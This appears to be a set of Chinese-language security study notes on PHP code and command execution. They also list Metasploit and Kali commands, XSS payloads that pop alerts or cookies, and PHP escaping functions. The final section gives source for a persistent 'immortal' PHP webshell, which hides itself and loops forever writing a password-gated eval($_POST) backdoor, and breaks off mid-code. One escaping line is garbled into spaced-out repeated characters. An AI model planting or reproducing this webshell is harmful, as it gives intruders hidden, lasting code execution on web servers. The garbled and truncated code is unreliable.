REC代码命令执行
代码执行又叫命令执行
代码执行
eval(‘echo 123;’); 当成echo执行
$myfile=fopen(“newfile.txt”,“w”)
命令执行
system(‘ipconfig’)
kali命令
sudo passwd root 更改密码
msfconsole 启动msf
connect
show all
show exploits 查看模块
show payloads 查看攻击载荷
options 查看需要设置的参数
Windows命令
netstat -an 查看开放端口
xss防御
nikto -host ip
php语句
函数addslashes 转义字符串
s t r = a d d s l a s h e s ( str=addslashes( str=addslashes(str);
stripslashes
htmlspecialchars_decode <>变成字符串
htmlspecialchars 解码
die()//结束运行,并输入
“<img src=x οnerrοr=alert ‘1’>” 找不到src地址就会弹窗 document.cookie 弹出cookie <script>alert’1’</script>
php不死马
<?php
ignore_user_abort(true); //忽略与用户的断开
set_time_limit(0); //脚本执行时间,0为一直执行
unlink(__FILE__); //不显示文件路径
$file = '.index.php'; // .为隐藏文件
$code = '<?php if(md5($_GET["pass"])=="x"){@eval($_POST[a]);} ?>';
while (1){
file_put_contents($file,$code